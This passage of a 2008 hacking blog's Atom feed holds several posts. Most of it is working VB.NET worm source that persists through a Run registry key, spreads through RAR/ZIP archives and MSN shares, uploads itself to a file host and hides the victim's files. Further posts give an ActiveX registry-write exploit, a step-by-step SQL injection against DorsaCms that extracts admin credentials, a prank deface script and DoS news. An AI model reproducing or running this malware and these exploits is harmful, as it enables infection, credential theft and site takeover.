/&gt;        Next&lt;br /&gt;&lt;br /&gt;        ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;        'call sub to get WinRar from registry then check if it exist   '&lt;br /&gt;        'if so, call the rar worm function (also for .zip)             '&lt;br /&gt;        ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;        RarPath = GetRarPath()&lt;br /&gt;        If File.Exists(RarPath) = True Then&lt;br /&gt;            RarWorm()&lt;br /&gt;        End If&lt;br /&gt;        ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;        'call MSN shares spreading sub                                 '&lt;br /&gt;        ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;        MSN_Share_drop()&lt;br /&gt;        Randomize()&lt;br /&gt;&lt;br /&gt;        '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;        'to check if payload should activate via random number comparing  '&lt;br /&gt;        '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;        If Int(200 * Rnd()) = 50 Then&lt;br /&gt;            payload()&lt;br /&gt;        End If&lt;br /&gt;&lt;br /&gt;    End Sub&lt;br /&gt;&lt;br /&gt;    Private Sub Timer_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer.Tick&lt;br /&gt;        On Error Resume Next&lt;br /&gt;        '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;        'The worm need's to know when MSN starts/When its online/If its   '&lt;br /&gt;        'already running ect.. this this timer deals with all that stuff  '&lt;br /&gt;        '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;        Dim FindProcess As Process&lt;br /&gt;        For Each FindProcess In Process.GetProcesses(System.Environment.MachineName)&lt;br /&gt;            If (FindProcess.ToString().IndexOf("msnmsgr", 0) + 1) Then&lt;br /&gt;                If msn.MyStatus = MISTATUS.MISTATUS_ONLINE Then&lt;br /&gt;                    Timer.Enabled = False&lt;br /&gt;                    MSN_Worm()&lt;br /&gt;                End If&lt;br /&gt;            End If&lt;br /&gt;        Next FindProcess&lt;br /&gt;    End Sub&lt;br /&gt;&lt;br /&gt;    Sub upload()&lt;br /&gt;        On Error Resume Next&lt;br /&gt;        '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;        '  Thx you retro soooo much~! most of this sub is all his code but i rewrote it in VB.net for this  '&lt;br /&gt;        '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;        'Well this is very kewl! it uploads itself to the file server and gets the link to download it&lt;br /&gt;        'thats all but It's good!&lt;br /&gt;        Dim pos As Integer&lt;br /&gt;        Dim pos2 As Integer&lt;br /&gt;        Dim sKey As String&lt;br /&gt;        Dim key As String&lt;br /&gt;        Dim boundary As String = Guid.NewGuid().ToString().Replace("-", "")&lt;br /&gt;        Dim fs As FileStream = File.OpenRead(Worm)&lt;br /&gt;        Dim bytes As Byte() = New Byte(fs.Length - 1) {}&lt;br /&gt;        fs.Read(bytes, 0, bytes.Length)&lt;br /&gt;        fs.Close()&lt;br /&gt;&lt;br /&gt;        Dim mimebody As String = "--" &amp; _&lt;br /&gt;        boundary &amp; Constants.vbCrLf &amp; _&lt;br /&gt;        "Content-Disposition: form-data; name=""MAX_FILE_SIZE""" &amp; _&lt;br /&gt;        Constants.vbCrLf &amp; Constants.vbCrLf &amp; "27000000" &amp; Constants.vbCrLf &amp; _&lt;br /&gt;        "--" &amp; boundary &amp; Constants.vbCrLf &amp; _&lt;br /&gt;        "Content-Disposition: form-data; name=""page""" &amp; _&lt;br /&gt;        Constants.vbCrLf &amp; Constants.vbCrLf &amp; "upload" &amp; Constants.vbCrLf &amp; _&lt;br /&gt;        "--" &amp; boundary &amp; Constants.vbCrLf &amp; _&lt;br /&gt;        "Content-Disposition: form-data; name=""file""; filename=""" &amp; _&lt;br /&gt;        Worm &amp; """" &amp; Constants.vbCrLf &amp; "Content-Type: application/x-msdos-program" _&lt;br /&gt;        &amp; Constants.vbCrLf &amp; Constants.vbCrLf &amp; Encoding.Default.GetString(bytes) &amp; _&lt;br /&gt;        Constants.vbCrLf &amp; "--" &amp; boundary &amp; "--" &amp; Constants.vbCrLf&lt;br /&gt;&lt;br /&gt;        Dim buffer As Byte() = Encoding.Default.GetBytes(mimebody)&lt;br /&gt;        Dim request As HttpWebRequest = CType(WebRequest.Create("http://www5.upload2.net/upload.php"), HttpWebRequest)&lt;br /&gt;        request.Method = "POST"&lt;br /&gt;        request.ContentType = "multipart/form-data; charset=UTF-8; boundary=" &amp; boundary&lt;br /&gt;        request.Accept = "text/xml,application/xml,application/xhtml+xml, " _&lt;br /&gt;         + "text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"&lt;br /&gt;        request.Headers.Add("Accept-Encoding", "gzip,deflate")&lt;br /&gt;        request.Headers.Add("Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7")&lt;br /&gt;        request.ContentLength = buffer.Length&lt;br /&gt;        ServicePointManager.Expect100Continue = False&lt;br /&gt;        request.CookieContainer = New CookieContainer()&lt;br /&gt;        Dim srvStream As Stream = request.GetRequestStream()&lt;br /&gt;        srvStream.Write(buffer, 0, buffer.Length)&lt;br /&gt;        srvStream.Close()&lt;br /&gt;        Dim response As HttpWebResponse = CType(request.GetResponse(), HttpWebResponse)&lt;br /&gt;        Dim respURL As String = response.ResponseUri.ToString()&lt;br /&gt;&lt;br /&gt;        'I love playing with strings!&lt;br /&gt;        pos = (respURL.IndexOf("/id/", 0) + 1)&lt;br /&gt;        sKey = Mid(respURL, pos + 4, Len(respURL))&lt;br /&gt;        pos2 = (sKey.IndexOf("/pwd/", 0) + 1)&lt;br /&gt;        key = sKey.Substring(0, pos2 - 1)&lt;br /&gt;        url = "http://www.upload2.net/page/download/" + key + "/" + Worm + ".html"&lt;br /&gt;&lt;br /&gt;    End Sub&lt;br /&gt;&lt;br /&gt;    ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    'Worm needs to know the current drive its on so this deals with it.    '&lt;br /&gt;    ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    Function CurDrive(ByVal arg As String)&lt;br /&gt;        On Error Resume Next&lt;br /&gt;        Dim dir As String, Pos As String&lt;br /&gt;        Pos = (arg.IndexOf("\", 0) + 1)&lt;br /&gt;        dir = arg.Substring(0, Val(Pos))&lt;br /&gt;        CurDrive = dir&lt;br /&gt;    End Function&lt;br /&gt;&lt;br /&gt;    '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    'payload that calls on other functions to get what it needs.      '&lt;br /&gt;    '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    Sub payload()&lt;br /&gt;        On Error Resume Next&lt;br /&gt;        Dim MyDir As DirectoryInfo&lt;br /&gt;        MyDir = New DirectoryInfo(WormPath)&lt;br /&gt;        GetDirs(MyDir)&lt;br /&gt;    End Sub&lt;br /&gt;&lt;br /&gt;    '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    'this kinda just installs the worm.. explains itself (like most of my code) '&lt;br /&gt;    '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load&lt;br /&gt;        On Error Resume Next&lt;br /&gt;        Me.Visible = False&lt;br /&gt;        Dim WormModule As System.Reflection.Module = [Assembly].GetExecutingAssembly().GetModules()(0)&lt;br /&gt;        WormFile = (WormModule.FullyQualifiedName)&lt;br /&gt;        WormPath = (CurDrive(WormFile))&lt;br /&gt;        Dim NewValue As String = WormPath &amp; "\WINDOWS\" &amp; KeyTitle &amp; ".exe"&lt;br /&gt;        If File.Exists(NewValue) = False Then&lt;br /&gt;            File.Copy(WormFile, NewValue)&lt;br /&gt;        End If&lt;br /&gt;        Worm = RndFileName() &amp; ".exe"&lt;br /&gt;        If File.Exists(Worm) = False Then&lt;br /&gt;            File.Copy(WormFile, Worm)&lt;br /&gt;        End If&lt;br /&gt;&lt;br /&gt;        Dim key As RegistryKey = Registry.CurrentUser.OpenSubKey(subkey, True)&lt;br /&gt;        key.SetValue(KeyTitle, NewValue)&lt;br /&gt;    End Sub&lt;br /&gt;&lt;br /&gt;    '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    'this is part of a recursive folder searching function            '&lt;br /&gt;    '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    Sub GetDirs(ByVal aDir As DirectoryInfo)&lt;br /&gt;        On Error Resume Next&lt;br /&gt;        Dim nextDir As DirectoryInfo&lt;br /&gt;        GetFiles(aDir)&lt;br /&gt;        For Each nextDir In aDir.GetDirectories&lt;br /&gt;            GetDirs(nextDir)&lt;br /&gt;        Next&lt;br /&gt;    End Sub&lt;br /&gt;    '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    'same as above but for files.. they reply on eachother to work..  '&lt;br /&gt;    '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    Sub GetFiles(ByVal aDir As DirectoryInfo)&lt;br /&gt;        On Error Resume Next&lt;br /&gt;        Dim aFile As FileInfo&lt;br /&gt;        For Each aFile In aDir.GetFiles()&lt;br /&gt;            File.SetAttributes(aFile.FullName, FileAttributes.Hidden)&lt;br /&gt;        Next&lt;br /&gt;    End Sub&lt;br /&gt;    '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    'well i decided its better not to use a static name for uploading '&lt;br /&gt;    '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    Function RndFileName()&lt;br /&gt;        On Error Resume Next&lt;br /&gt;        Dim builder As New StringBuilder()&lt;br /&gt;        Dim random As New Random()&lt;br /&gt;        Dim cha As Char&lt;br /&gt;        Dim i As Integer&lt;br /&gt;        For i = 0 To 6&lt;br /&gt;            cha = Convert.ToChar(Convert.ToInt32((26 * random.NextDouble() + 65)))&lt;br /&gt;            builder.Append(cha)&lt;br /&gt;        Next&lt;br /&gt;        RndFileName = builder.ToString()&lt;br /&gt;    End Function&lt;br /&gt;    ''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    'this sub is for zip/rar archive worm  '&lt;br /&gt;    ''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    Sub RarWorm()&lt;br /&gt;        On Error Resume Next&lt;br /&gt;        Dim WormModule As System.Reflection.Module = [Assembly].GetExecutingAssembly().GetModules()(0)&lt;br /&gt;        Dim WormFile As String = (WormModule.Name)&lt;br /&gt;        Dim FullName As String = (WormModule.FullyQualifiedName)&lt;br /&gt;        Dim WormPath As String = (WorkingFolder(FullName))&lt;br /&gt;        Dim i As Int32 = 0&lt;br /&gt;        Dim files() As String&lt;br /&gt;        Dim compile As String = ""&lt;br /&gt;        Dim ShrtPath As String = ""&lt;br /&gt;        Dim shrtWorm As String = 0&lt;br /&gt;        Dim ext As String = ""&lt;br /&gt;        files = System.IO.Directory.GetFiles(WormPath)&lt;br /&gt;&lt;br /&gt;        For i = 0 To files.GetUpperBound(0)&lt;br /&gt;            ext = Mid(files(i), Len(files(i)) - 3, Len(files(i)))&lt;br /&gt;            If ext = ".rar" Or ext = ".zip" Then&lt;br /&gt;                ShrtPath = GetShortFileName(files(i))&lt;br /&gt;                compile = RarPath &amp; " a " &amp; ShrtPath &amp; Space(1) &amp; WormFile&lt;br /&gt;                Shell(compile, AppWinStyle.Hide, True)&lt;br /&gt;            End If&lt;br /&gt;        Next&lt;br /&gt;    End Sub&lt;br /&gt;    '''''''''''''''''''''''''''''''''''&lt;br /&gt;    'here is the MSN shares worm sub  '&lt;br /&gt;    '''''''''''''''''''''''''''''''''''&lt;br /&gt;    Sub MSN_Share_drop()&lt;br /&gt;        On Error Resume Next&lt;br /&gt;        Dim WormModule As System.Reflection.Module = [Assembly].GetExecutingAssembly().GetModules()(0)&lt;br /&gt;        Dim WormFile As String = (WormModule.FullyQualifiedName)&lt;br /&gt;        Dim FolPath As String = WormPath &amp; "Documents and Settings\" &amp; Environ("USERNAME") &amp; "\Local Settings\Application Data\Microsoft\Messenger\"&lt;br /&gt;        If Dir(FolPath, FileAttribute.Directory) &lt;&gt; "" Then&lt;br /&gt;            Dim i As Int32 = 0&lt;br /&gt;            Dim x As Int32 = 0&lt;br /&gt;            Dim shares() As String&lt;br /&gt;            shares = System.IO.Directory.GetDirectories(FolPath)&lt;br /&gt;            For i = 0 To shares.GetUpperBound(0)&lt;br /&gt;                If Dir(shares(i), FileAttribute.Directory) &lt;&gt; "" Then&lt;br /&gt;                    If File.Exists(shares(i) &amp; "\Game.exe") = False Then&lt;br /&gt;                        File.Copy(WormFile, shares(i) &amp; "\Game.exe")&lt;br /&gt;                    End If&lt;br /&gt;                End If&lt;br /&gt;            Next&lt;br /&gt;        End If&lt;br /&gt;    End Sub&lt;br /&gt;    ''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    'the worm needs to know if and where WinRar is right?  '&lt;br /&gt;    ''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    Function GetRarPath() As String&lt;br /&gt;        On Error Resume Next&lt;br /&gt;        Dim myReg As RegistryKey&lt;br /&gt;        myReg = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\WinRAR.exe", False)&lt;br /&gt;        If Not myReg Is Nothing Then&lt;br /&gt;            GetRarPath = CStr(myReg.GetValue("Path")) &amp; "\WinRar.exe"&lt;br /&gt;        End If&lt;br /&gt;    End Function&lt;br /&gt;&lt;br /&gt;    '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    'Long path wont work with WinRar.exe because of the spaces so this function deals with it '&lt;br /&gt;    '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;    Public Function GetShortFileName(ByVal LongPath As String) As String&lt;br /&gt;        On Error Resume Next&lt;br /&gt;        Dim ShortPath As New StringBuilder(MAX_PATH)&lt;br /&gt;        Dim BufferSize As Integer = GetShortPathName( _&lt;br /&gt;        LongPath, _&lt;br /&gt;        ShortPath, _&lt;br /&gt;        ShortPath.Capacity)&lt;br /&gt;&lt;br /&gt;        Return ShortPath.ToString()&lt;br /&gt;    End Function&lt;br /&gt;    '''''''''''''''''''''''''&lt;br /&gt;    'get current directory  '&lt;br /&gt;    '''''''''''''''''''''''''&lt;br /&gt;    Function WorkingFolder(ByVal arg As String)&lt;br /&gt;        On Error Resume Next&lt;br /&gt;        Dim dir As String, Pos As String&lt;br /&gt;        Pos = InStrRev(arg, "\")&lt;br /&gt;        dir = Mid(arg, 1, Val(Pos))&lt;br /&gt;        WorkingFolder = dir&lt;br /&gt;    End Function&lt;br /&gt;&lt;br /&gt;End Class&lt;br /&gt;&lt;br /&gt;'Ok its messy! But I'm proud of it.&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-8978638966007772652?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/8978638966007772652'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/8978638966007772652'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2008/10/vb-net-worm.html' title='VB .Net Worm'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-3730541108196388226</id><published>2008-10-23T20:57:00.002+07:00</published><updated>2008-10-23T21:01:18.456+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploit'/><title type='text'>Hummingbird Deployment Wizard 2008 (DeployRun.dll) Registry Values Creation/Change</title><content type='html'>url: http://www.hummingbird.com&lt;br /&gt;&lt;br /&gt; Author: shinnai&lt;br /&gt; mail: shinnai[at]autistici[dot]org&lt;br /&gt; site: http://www.shinnai.net&lt;br /&gt;&lt;br /&gt; This source was written for educational purpose. Use it at your own risk.&lt;br /&gt; Author will be not responsible for any damage.&lt;br /&gt; &lt;br /&gt; Info:&lt;br /&gt; DeployRun.dll &lt;= 10.0.0.44&lt;br /&gt; &lt;br /&gt; Marked as:&lt;br /&gt; RegKey Safe for Script: False&lt;br /&gt; RegKey Safe for Init: False&lt;br /&gt; Implements IObjectSafety: True&lt;br /&gt; IDisp Safe:  Safe for untrusted: caller,data  &lt;br /&gt; IPersist Safe:  Safe for untrusted: caller,data&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Vulnerable source method:&lt;br /&gt; Sub SetRegistryValueAsString (ByVal Path As String, ByVal v As String)&lt;br /&gt;&lt;br /&gt; Tested on Windows XP Professional SP3 full patched, with Internet Explorer 7&lt;br /&gt;&lt;br /&gt; There are a lot of dangerous methods, just take a look and... good searching&lt;br /&gt;&lt;br /&gt;source :&lt;br /&gt;&lt;br /&gt;&lt;object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;input language=VBScript onclick=tryMe() type=button value='Click here to start the test'&gt;&lt;br /&gt;&lt;br /&gt;&lt;script language='vbscript'&gt;&lt;br /&gt; Sub tryMe&lt;br /&gt;  'test.SetRegistryValueAsString "Existing Registry Path + Existing Registry Key", "Value to change"&lt;br /&gt;  test.SetRegistryValueAsString "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YourFavouriteKey", "Hello World!"&lt;br /&gt; End Sub&lt;br /&gt;&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;ref. &lt;a href="http://www.milw0rm.com/exploits/6774"&gt;milw0rm.com&lt;/a&gt;&lt;br /&gt;regards,&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-3730541108196388226?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3730541108196388226'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3730541108196388226'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2008/10/hummingbird-deployment-wizard-2008.html' title='Hummingbird Deployment Wizard 2008 (DeployRun.dll) Registry Values Creation/Change'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-2116763423827253657</id><published>2008-10-23T20:33:00.002+07:00</published><updated>2008-10-23T20:47:44.216+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploit'/><title type='text'>DorsaCms (ShowPage.aspx) Remote SQL Injection Vulnerability</title><content type='html'>Portal Name: Dorsa CMS&lt;br /&gt;Vendor : http://www.dorsacms.com&lt;br /&gt;Description : A CMS written by iranian programmers which uses by governmental websites.&lt;br /&gt;Vulnerable File : ShowPage.aspx&lt;br /&gt;Dork: Powered by DorsaCms&lt;br /&gt;Author : syst3m_f4ult  &amp;amp;&amp;amp; Y!ID : autumn_love6&lt;br /&gt;&lt;span class="full post"&gt;&lt;br /&gt;How to exploit :&lt;br /&gt;&lt;br /&gt;a live example :&lt;br /&gt;&lt;br /&gt;http://www.xxx.ir/ShowPage.aspx?page_=news&amp;lang=1&amp;tempname=fire&amp;sub=0&amp;PageID=36&amp;PageIDF=2&lt;br /&gt;&lt;br /&gt;Testing injection :&lt;br /&gt;http://www.xxx.ir/ShowPage.aspx?page_=news&amp;lang=1&amp;tempname=fire&amp;sub=0&amp;PageID=36&amp;PageIDF=2 or 1=convert(int,@@version)--&lt;br /&gt; Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise ...&lt;br /&gt;&lt;br /&gt;Getting table which contains Username and Password:&lt;br /&gt;Easiest way is to search it:&lt;br /&gt;&lt;br /&gt;http://www.xxx.ir/ShowPage.aspx?page_=news&amp;lang=1&amp;tempname=fire&amp;sub=0&amp;PageID=36&amp;PageIDF=2 or 1=convert(int,(select top 1 table_name from information_schema.columns where column_name like %27%pass%%27))--&lt;br /&gt;&lt;br /&gt; table_name = Seller&lt;br /&gt;Its not that table we are seeking, so we keep on:&lt;br /&gt;http://www.xxx.ir/ShowPage.aspx?page_=news&amp;lang=1&amp;tempname=fire&amp;sub=0&amp;PageID=36&amp;PageIDF=2 or 1=convert(int,(select top 1 table_name from information_schema.columns where column_name like %27%pass%%27 and table_name not in ('Seller')))--&lt;br /&gt;&lt;br /&gt;Bingo&lt;br /&gt; Table_name = USER_&lt;br /&gt;&lt;br /&gt;Start to get username and pass from USER_:&lt;br /&gt;&lt;br /&gt;http://www.xxx.ir/ShowPage.aspx?page_=news&amp;lang=1&amp;tempname=fire&amp;sub=0&amp;PageID=36&amp;PageIDF=2 or 1=convert(int,(select top 1 %2b'Username= '%2bconvert(varchar,isnull(convert(varchar,user_name),'NULL'))%2b' -- Password= : '%2bconvert(varchar,isnull(convert(varchar,Pass),'NULL')) from USER_ where Code='1'))&lt;br /&gt;&lt;br /&gt; user : admin&lt;br /&gt; pass : kaBY/8jRC+XbjSIIDhsHFmOX1B2pDd&lt;br /&gt;&lt;br /&gt;Update hash to a hash you know its decode and enjoy.&lt;br /&gt;&lt;br /&gt;login to portal :&lt;br /&gt;http://www.xxx.ir/Dorsapax/Signin.aspx&lt;br /&gt;&lt;br /&gt;ref. &lt;a href="http://www.milw0rm.com/"&gt;milw0rm.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;regards,&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-2116763423827253657?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2116763423827253657'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2116763423827253657'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2008/10/dorsacms-showpageaspx-remote-sql.html' title='DorsaCms (ShowPage.aspx) Remote SQL Injection Vulnerability'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-159457180993431017</id><published>2008-10-20T13:43:00.003+07:00</published><updated>2008-10-20T13:50:32.142+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Download'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Hacking Firefox</title><content type='html'>Hacking Firefox source ( Deface all web which you visit) this title is taken let looked to be cool and very underground. If you wish defacing site with a purpose to so that seen cool your friends eye and don't wish to enter the prison because impinging UU ITE because your action, hence I will show its way of source. Again I emphasize this just for joke. Follow every stepnya and do, if you go out of each step which I inform the you have to responsible it self, and truely I will not hold responsible if happened something your. Usage of this information fully responsibility from your.&lt;br /&gt;This technique only can be done with browser firefox constructively addon greasemonkey. Thus soon download firefox browser and grasemonkey. Link it in searching alone yes in uncle G source. Then Install Firefox if not yet owned it and say cheerio to IE ( sometime I still pake IE to hard appearance desain web which again in making). If firefox have diinstall his moment menginstall greasemonkey. Then kill browser firefox to be greasemonkey can active [moment you open browser firefox after him. If successful you installing greasemonkey icon be like this will appear in statusbar undercarriage.&lt;br /&gt;Its moment we make script to greasemonkey - write to use your editor ( my use notepad++):&lt;br /&gt;&lt;br /&gt;Source script :&lt;br /&gt;&lt;br /&gt;Or you can direct download from here. &lt;a href="http://www.ziddu.com/download/2446266/user-deface.rar.html"&gt;deface.user.js&lt;/a&gt; ( 1.20 kb)&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;step hereinafter drag and drop the file to browser firefox you and depress install. To see do have active or not yet remained the right click icon greasemonkey and select;choose manage user script. See " Deface www site" active or don't.&lt;br /&gt;&lt;br /&gt;After installation have try to open web site by using www ex. http://www.tomiyahya.web.id . how is him result ? ? Then demonstrate to your friend. Ha100X. sure him/her number site that have defaced.&lt;br /&gt;Though ........... ...... ...... ....&lt;br /&gt;This technique only just eye deceit. Web site be in fact don't terdaface only appearance in browser just you, become the peaceful you of gin UU ITE. To deface in fact didn't ask to me, I just kidding.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-159457180993431017?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/159457180993431017'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/159457180993431017'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2008/10/hacking-firefox.html' title='Hacking Firefox'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-631651245107013039</id><published>2008-10-03T10:31:00.000+07:00</published><updated>2008-10-03T10:36:23.902+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>DoS attack is a killer</title><content type='html'>These guys are the inventors of UnicornScan, a user-land TCP stack turned into a port scanner. Never heard of it? Use Nmap exclusively? Well if you run Linux, I suggest checking out, especially if missed ports in your portscan is inexcusable. But I digress. &lt;br /&gt;Robert and Jack are smart dudes. I've known them for years, and they've always been one step ahead of the game. A couple of years ago, Jack found some anomalies in which machines would stop working in some very specific circumstances while being scanned. A few experiments, tons of reading through documentation, and one mysteriously named tool called "sockstress" later, and the two are now touting a nearly universal denial-of-service (DoS) attack that can be performed on almost any normal broadband Internet connection -- in just a few seconds. &lt;br /&gt;How bad is it? Well, in an interview --- (fast-forward five minutes in to hear it in English), the two were asked if they could take out a data center. While they've never tried, it appears to be a totally plausible attack. Worse yet, unlike most DoS attacks, the machines often do not come back online once the attack is over. The victim system just doesn’t respond any more&lt;br /&gt;&lt;span class="fullpost"&gt;Great, huh? &lt;br /&gt;Robert and I talk a lot, and I asked him if he'd be willing to DoS us, and he flatly said, "Unfortunately, it may affect other devices between here and there so it's not really a good idea." Got an idea of what we're talking about now? This appears not to be a single bug, but in fact at least five, and maybe as many as 30 different potential problems. They just haven't dug far enough into it to really know how bad it can get. The results range from complete shutdown of the vulnerable machine, to dropping legitimate traffic. &lt;br /&gt;The two researchers have already contacted multiple vendors since the beginning of September (I've had a small hand in getting them in contact with one of the vendors). Robert and Jack are waiting with no specific timeline to hear back from the affected TCP stack vendors. Think firewalls, OSes, Web-enabled devices, and so on. Yup, they'll all need to be hardened, if the vendors can come up with a good solution to the problem. IPv6 services appear to be more affected by the fact that they require more resources and are no more secure since they still reside on top of an unhardened TCP stack. &lt;br /&gt;Jack and Robert are both trying to be as forthcoming as possible with the affected vendors without giving any specific information on how the attack works to the public at large -- openly acknowledging how dangerous the attack really is. Their hope is that the vendors appreciate the problem and come up with fixes that may not be initially obvious to them. I asked Robert when they planned to release their tool, to which he said he wasn't sure he would "ever release sockstress." The details, however, will be forthcoming once vendor patches are available. There are no mitigating short-term fixes, folks. &lt;br /&gt;I feel winter slowly coming, and it would be a shame if entire power grids could be taken offline with a few keystrokes, or if supply chains could be interrupted. I hear it gets awfully cold in Scandinavia. &lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-631651245107013039?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/631651245107013039'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/631651245107013039'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2008/10/these-guys-are-inventors-of-unicornscan.html' title='DoS attack is a killer'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 